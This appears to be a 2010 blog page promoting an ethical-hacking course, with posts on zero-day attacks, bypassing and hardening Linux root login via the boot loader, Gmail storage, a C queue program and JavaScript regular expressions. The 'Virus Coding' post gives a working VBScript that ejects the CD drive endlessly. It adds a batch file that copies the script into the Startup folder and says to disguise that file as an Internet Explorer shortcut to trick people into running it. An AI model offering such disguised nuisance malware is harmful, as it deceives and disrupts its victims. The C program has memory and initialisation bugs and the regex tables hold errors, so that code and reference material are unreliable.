Wednesday, February 17, 2010

Why we need ethical hackers?


Computers around the world are systematically being victimized by rampant hacking. This hacking is not only widespread, but is being executed so flawlessly that the attackers compromise a system, steal everything of value and completely erase their tracks within 20 minutes. 
While most of the companies are ignorant of their security controls, many succumb to hackers inspite of having the best security systems and policies in place. Breaking sites, defacing them with anti national and porno messages, reading the e-mail secretly, cracking mail passwords,stealing credit card numbers from online shopping site or implant software that will secretly transmit their organization’s secrets to the open Internet have become rampant in the recent past. While the best of security continues to get broken time to time by the determined hackers, what options can a helpless organizations look forward to?
Even in cyber cafes(where most of us regularly visit) ,when we type our mail id and password, a simple  software can trap it and your details activity can be mailed to an unknown person,without any knowledge of the user.How a normal individual will protect his privacy and cope with these sort of situation?


It is no longer adequate to buy and install a simple software package and let it run. Companies need specialists, IT professionals dedicated to network security and trained to find security holes and fix them before they can be exploited.

Globally, with a tremendous rise in cyber crime, there is a rapidly growing demand for highly skilled professional called  ethical hackers who can safeguard the Internet and  corporate networks and their web sites.
The job of ethical hackers is to get into the minds of the computer criminals, think like them and come up with innovative methods to protect computer systems and corporate networks.

Though we have thousands of security consultants from various companies, very few of them are actually aware of measures to counter hacker threats. So,India needs  institutions which would train companies or students in the art of defending their own cyberspace.
Keeping the above things in mind, we have started   course on Ethical Hacking, called “IT Security and Antihacking” which is the first of its kind in WestBengal.aimed at information security professionals, auditors, CTOs, CIOs, network administrators, students.
demand for ethical hackers from sectors like banking, finance, telecom and companies with large network and huge on-line database.


The course curriculum is designed to teach, providing a structured methodology for detailing the techniques used by hackers to assess and attack corporate networks. Beginning with a ethical part of whole things, covering legal and HR issues, reasons why one must perform ethical hack, common attack types and vulnerabilities etc,
Anybody with a basic understanding of computers and network can join in the program. Even normal café users can also do the course to protect his/her privacy at café,office etc.
For course details contact us.

General Hacking


                                     Zero Day Attack







                                       By- Abir Atarthy


Definition:
zero-day (or zero-hourattack or threat is a computer threat that tries to exploit computer application vulnerabilities that are unknown to others, undisclosed to the software developer, or for which no security fix is available. Zero-day exploits (actual code that can use a security hole to carry out an attack) are used or shared by attackers before the software developer knows about the vulnerability.A zero day attack will take advantage of that problem before a patch has been created. It is named zero day because it occurs before the first day the vulnerability is known.



Attack Vectors
Malware writers are able to exploit zero-day vulnerabilities through several different attack vectors. For example, when users visit rogue (or black hat) web sites, code on the site may exploit vulnerabilities in web browsers. Web browsers are a particular target because of their widespread distribution and usage. Hackers can also send e-mail attachments, which exploit vulnerabilities in the application opening the attachment. Typically badly written software will be vulnerable to several zero-day vulnerabilities in a short period of time.
Vulnerability Window
Zero-day attacks occur during the vulnerability window that exists in the time between when a vulnerability is first exploited and when software developers start to develop a counter to that threat.
For viruses, Trojans and other zero-day attacks, the vulnerability window follows this time line:
  • The developer creates software containing an (unknown) vulnerability
  • The attacker finds the vulnerability before the developer does
  • The attacker writes and distributes an exploit while the vulnerability is not known to the developer
  • The developer finds the vulnerability and starts developing a fix.


Protection
 
Protecting against zero day vulnerability exploitation is a matter of great concern for most system administrators. To reduce the impact of a zero day attack, follow best business practices such as:
 


  • Adopt a deny-all stance on firewalls and perimeter devices that protect internal networks

     
  • Separate public-facing servers from internal systems

     
  • Turn off unneeded services and remove user applications that do not support operational needs

     
  • Follow the Principle of Least Privilege in setting user access controls, permissions, and rights

     
  • Restrict or limit the use of active code such as Java script or ActiveX in browsers

     
  • Educate users about opening unsolicited file attachments

     
  • Disable the ability to follow links in email

     
  • Disable the ability to automatically download images from the web in email

     
  • Maintain an aggressive in-house security alerting and warning service (or outsource the capability) to become aware of zero-day exploits as they become public.

     
  • Use end-point management solutions to rapidly issue patches or workarounds as they become available
  • Use third-party buffer overflow protection where possible on all systems
     

Linux hacking

Securing Linux by
hardening GRUB boot
loader

By Abir Ranjan  Atarthy

After reading my last article "Hacking Root password of Linux" few of you have asked me how to  secure Linux specially the GRUB boot loader.
So i will tell something regarding that.

INTRODUCTION
A running Linux server is prone to various types of security threats. We categorize them as
 
  • Local Security threats
     
  • Remote/Network Security threats

While there are many articles that have explained in great detail the Networking
security threats and mechanisms to deal with it, there are a few that have also dealt
with the local security aspect. These types of attacks primarily entail gaining illegal
root access to an unattended system by running a brute-force password cracking
program or by simply rebooting the system and passing some standard arguments to
the boot loader program.

TYPES OF BOOTLOADERS FOR LINUX

Basically, Linux can be loaded by two types of bootloaders. These are :
1. LILO - Linux Loader
2. GRUB - Grand Unified Bootloader
Here i will be mainly focusing on GRUB.

HOW TO HACK?
So let us now understand hacking.
 
Method1:
This is the most well known and easiest method. The procedure is to boot up
the system to init level 1 i.e. in the Single user mode. We can do so with :
LILO: linux init 1 (for LILO)
for GRUB, simply press 'a' when the boot up screen is displayed.
And at the end of the line displayed, type init 1 and press the enter key.
With this, you will be given the root shell. Now you can change the root password by
running the 'passwd' command. After rebooting the system, hacking in would be
possible.
How to secure?
The only way to secure the system from this menace is by prompting the user for root
password even when he boots the system in the single user mode. We can easily
achieve this by adding a single line to the /etc/inittab file.
~~:S:wait:/sbin/sulogin
This line will instruct the init to prompt for the root password by executing the 'sulogin'
program.

Method2:-

Even if you have protected your system from any unauthorized attacks by the first
method, there are always other ways of your system being hacked into. Also we have
not yet protected our kernel from receiving arguments through the command line
which calls for some more system strengthening to be done.

When the system boots up, in case of LILO, you could pass the argument as
init=/bin/bash or init=/bin/sh
or by choosing the 'a' option if you are running GRUB
The init boots up the system and ends up in a Bash shell. You will be now given the
root access, though the root file system is mounted in read-only mode, which means
that while you can read everything from the system, you would not be able to do
anything other than that.
The root password cannot be changed by anyone! Now the quest is to remount the root
file system in read-write mode as follows :
#mount -o rw,remount / (for a LILO Booted Kernel)
The same command does not work with a GRUB loaded kernel.
#mount -n -o remount, rw / (for a GRUB Booted Kernel)
Since we are remounting a read-only root file system, nothing could be written to the /
etc/fstab and /etc/mtab file. And the -n parameter will further ensure the same.
Since we are remounting the file system which in turn is going to update some flags,
the -o parameter is used.
The other parameters are obvious to understand.

How to secure?

1. The only intuitive method to protect the system from this and any other kind of
attack is to protect the kernel from getting user-supplied arguments from the LILO or
GRUB prompt. This can be done by protecting the LILO or grub.conf file.
Add “password=urpassword” to the kernel definition of the lilo.conf or grub.conf.
Change the mode of the file to 600 as
#chmod 600 grub.conf or lilo.conf
This is mandatory because the file should not be allowed to be modified by non-root
users.
You can make the lilo.conf/grub.conf file immutable in another way also
#chattr +i/etc/lilo.conf
#chattr +i/boot/grub/grub.conf (if you are using GRUB)

Virus Coding

CD/DVD drive hack

                          By - Abir Atarthy

 A basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till closed just copy paste this code into Notepad  and save as CDfun.vbs and dont forget the .vbs part.


set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()


now this is funny but what if it was even funnier. what if every time you started you r computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.

1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs

Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.

Gmail Hacking

Keeping your GMail Inbox size under control

By Somenath Singh

Google Gmail gives you more than 7.5 GB of Inbox space sufficient to store hundreds of thousands of email messages. But you can quickly run out of space even on GMail if your friends regularly email you PDF, video attachments, sound clips, large zipped files, or high-resolution photographs.


When you near the GMail storage limit, the quota indicator displayed at the bottom of your account (that says - You are currently using 59 MB (2%) of your 2720 MB) will change from green to red.


If you go over your storage limit, Gmail will hold your messages for a few days while you clear out some space. If you don't delete anything within that allotted time, you won't be able to receive new messages, and messages sent to your account will then be returned to sender.

Before your GMail Inbox space gets almost full, follow one of these tips:

» The query string "has:attachment" will list all messages that have an attachment. If you further refine the string to "has:attachment from:me label:sent" - it will show all messages with attachment in the Sent Mail folder that were sent by you. Deleting them can retrieve lot of important space.

» Queries like filename:pdf or filename:xls will show messages that have attachments of a specific type. Combine them with a label:sent to display all the PDF files that you have you sent in the past.

» You can set GMail to display upto 100 messages per page. This setting is useful while deleting a more number of messages in one go.


» A query of the form "before:2009/01/01 label:sent" will retrieve all message sent by your before January 1, 2009 - You might want to clear your old sent items using this technique.

» If you have subscribed to tons of mailing lists, now is a good time to get rid of them - you will probably never read them and they are anyway available on the group website. Open a list message, view the header and copy the email address mentioned in the from field. Run a query like from:mail-address@list.com - Choose select all and press delete.

» If GMail search operators tend to confuse you, download your GMail messages to a local mail client like Outlook or Thunderbird that supports POP3 access.

» GMail won't allow you to search or sort emails by the size of attachments. However, your offline client will definitely have this feature. Find messages with the bulkiest attachments in Outlook, then search for the same message in GMail and delete it.

» Don't use the GMail drives that promise to convert your GMail inbox into a virtual hard disk. You may have to wait a little but both Google and Microsoft are about to launch file storage services. Read more about Google GDrive and Windows Live Drive.

-----------------------------


C/C++

                 OUPUT RESTRICTED QUEUE.

                      By- Tanaya Karmakar
(Future Group  of Engineering College,Kolkata)

/* Queue is a data strucure where insertion of new elements are done at rear while deletion of elements are done
from front of the queue.
OUPUT RESTRICTED QUEUE is a queue where insertion of elements are done both rear and front, and deletion can only be done
from front of the queue.
here is a C program that implements the OUPUT RESTRICTED QUEUE.
Hope this will help to all Data Structure students.
Though the full program is given below, I have created a link for your easier download.
http://rapidshare.com/files/351465112/output_restricted.c
*/

/*OUPUT RESTRICTED QUEUE */
#include
#include
struct list
{
int data;
struct list *next;
};
typedef struct list node;
node *front,*rear;
void ins_at_beg(node **,node **,int);
void ins_at_end(node **,node **,int);
void del(node **);
void show(node *);
void main()
{
int ch,num;
front=rear=NULL;
while(ch!=4)
{
printf("\n1->enter item at the beginning\n");
printf("2->enter item at the end\n");
printf("3->delete item\n");
printf("Enter choice(1,2 or 3)->");
scanf("%d",&ch);
switch(ch)
{
case 1:
printf("Enter num: ");
scanf("%d",&num);
ins_at_beg(&front,&rear,num);
printf("\nThe list is:\n");
show(front);
break;
case 2:
printf("Enter num: ");
scanf("%d",&num);
ins_at_end(&front,&rear,num);
printf("\nThe list is:\n");
show(front);
break;
case 3:
del(&front);
printf("\nAfter deletion,the list is:\n");
show(front);
break;
default:
printf("\nWrong choice\n");
exit(0);
}
}
}
void ins_at_beg(node **front,node **rear,int num)
{
node *q;
q=(node *)malloc(sizeof(node));
q->data=num;
if(*front==NULL)
{
q->next=*front;
*front=q;
*rear=*front;
}
else
{
q->next=*front;
*front=q;
}
}
void ins_at_end(node **front,node **rear,int num)
{
node *q;
node *p;
p=*front;
while(p->next!=NULL)
{
p=p->next;
}
q=(node *)malloc(sizeof(node));
q->data=num;
p->next=q;
*rear=q;
(*rear)->next=NULL;
}
void del(node **front)
{
node *q;
if(*front==NULL)
{
printf("Queue is empty");
return;
}
else
{
q=(node *)malloc(sizeof(node));
q->data=(*front)->data;
*front=(*front)->next;
free(q);
}
}
void show(node *p)
{
while(p!=NULL)
{
printf("%d\t",p->data);
p=p->next;
}
}

-----------------------

Tuesday, February 16, 2010

Java Script

Regular  Expression  in Java Script:-

By  Tanaya Karmakar
(Future Group  of Engineering College,Kolkata)

Regular  Expression :-
Regular  Expression  are  basically  throws  a  restriction  on  the  input  entered  by  the  user  in  each  field  of  a  validation  form.
Syntax  of  Regular  Expression :-
var  regexp=/pattern/
Why  to  use  regular  expression ?
Just  think  about  my  javascript  validation form, threre  was  a  field  that  wanted  the  user  to  enter his  or  her  date  of  birth and  for this  “dd” ,”mm” and “yyyy”  were  provided.Now ,just  assume  that you  are  filling such  kind  of  form  to  have your  own ID and  if  you  enter  string (eg  your name) in the  above  mentioned  field  or  enter  numbers  in the “name” field or incompatibility  between password  and  confirm password  then there  will be  an incompatibility  between  the  required  and  your  entered   input . To prevent  such kind  of incompatibility ,regular expressions  are  necessary.
What  is  pattern  matching  characters ?
Before  moving  on  to  the  pattern  matching  characters   we  have  to  know  what  is  pattern  string. Pattern  matching  strings  are  basically  search  string  that  searches  in the  main  string  whether  that  string  defined  as  pattern  lies  in  the  main string  or  not.
For  example,
var   pat=/php/  ;
This  will  search  in  the  main  string  whether  “php”  is  present  in  main string  or  not.
They  are  basically literal  characters  and  metacharacters (eg  ‘$’ , ‘^’  etc) that are required  to  define  a  pattern  string  that represent  the  search  criteria or  better  to  say search  for  a  particular  in the  entered  input.
Categories  of  Pattern  Matching  Characters :-
Pattern  matching  characters  can be  grouped  in variuous  categories. Once  you  about  these  categories  , you  can  easily write your  own  regular expression  and incorporate  them  where  required.
The categories  are:-
Position Matching :- This  is  required  to  match  a  substring  that  occurs  at  a  specific  position  in the  main  string. For  example , a  substring  that  occurs  at the  beginning or at the  end  or  at  any  position  of   the  main  string.
Special  literal  character  matching :-All  alphabetic  and  numeric  characters  by default  match  themselves  literally  in  regular  expressions. For  example , to  match  a  newline ,the  syntax  “\n”  is  used,while  “\r”  matches  a  carriage return.
Character  classes  matching :-In  this  category, individual  characters  are  combined  into  character classes  in order  to  form  more  complex  matches  by  placing  them  in containers  like  square bracket.For  example ,/[abc]/  matches  either  “a”  or  “b”  or  “c”  in  a  string  while  /[a-zA-Z0-9]/  matches  all  alphaneumeric  characters.
Repitition  matching :-This  matching  is  required  whenever  it  is  required  to  search  for  a  certain repitition  in  a  string .For  example, to  match  “555”  , the  easy  way  to use  /5{3}/.
Alternation  and  grouping  matching :-This  category  is  required  whenever  a  group  of  characters  are  treated  as  a  single  entity . You  can  add  an “OR”  logic  to  your  pattern  matching.
Back  reference  matching :- This  category  is  used  whenever  a  particular  match  in  the  string  is  based  on  the  result  of  the  earlier  match.  
 Detailed  description  of  above  mentioned  categories:-
Position  matching :-
Symbol                      Description                                       Example
^                     Matches  the  beginning  of  the  string. /^The/  matches  “the”  in “The  night”.
$                      Matches  the  end  of  the  string.            /and$/  matches  “and”  in “Land”.
\b                   Matches   any  word  boundary.              /ly\b/ matches “ly” in “This is really cool”.
\B                    Matches  any  non-word  boundary.      /\Bor/ matches  “or” in “normal”.
Literals:-
Symbol                      Description
\n                    Matches  a  newline  character.
\f                     Matches  a  formal  feed  character.
\r                     Matches  a  carriage  return  character.
\t                     Matches  a  horizontal  tab  character.
\v                   Matches  a   vertical  tab  character.
\uxxxx             Matches   the  ASCII  character  expressed  by  the  UNICODE  xxxx.
Character   classes:-
Symbol          Description
[xyz]                Matches  any  one  character  enclosed  in the  character set. Hyphen  can  also be  used               to  denote  the  range.
[^xyz]              Matches  any  one  character  not  enclosed  in  the  character  set.
\w                  Matches  any  alphaneumeric  character  including underscore.
\W                  Matches  any  single  non word  character (like [^a-zA-Z0-9]).
\d                   Matches  any  single digit (equivalent  to  [0-9]).
\D                   Matches  any  non digit (equivalent  to [^0-9]).
\s                    Matches  any  single  space  character (equivalent  to  [\t\r\n\v\f]).
\S                    Matches  any   single  non-space  character (equivalent  to  [^\t\r\n\v\f]).
Repitition :-
Symbol                      Description
{x}                    Matches  exactly  x  occurences  of  a  regular  expression.
{x,}                   Matches  x or  more  occurences.
{x,y}                 Matches  x  to  y  number  of  occurences.
?                      Matches  zero  or  one  occurences. Equivalent  to {0,1}.
 *                          Match  zero  or more  occurenences. Equivalent  to  {0,}.
Alternation  &  Grouping :-
Symbol                      Description
()                      Grouping  characters  together  to  create  a  clause. May  be  nested.
|                      Alternation  combines  clauses  into one  regular  expression  and  then  matches  any  of the  individual  clauses.
Pattern  Switches :-They  are  used  to  make  the  pattern  case-insensitive  .
Property         Description
I                       Ignore  the  case  of  the  character.
g                      Global  search  for  all  occurences  of  a  pattern.
gi                     Global  search , ignore  case.
Conclusion :-
From  the  above  description ,  we  can see  that  regular  expression  helps  us  a  lot  inthe  situations  like  filling  up  validation  form  and  restricts  user  from  entering  abnormal  input  and  removes  incompatibility  between  entered  input  and  required  input.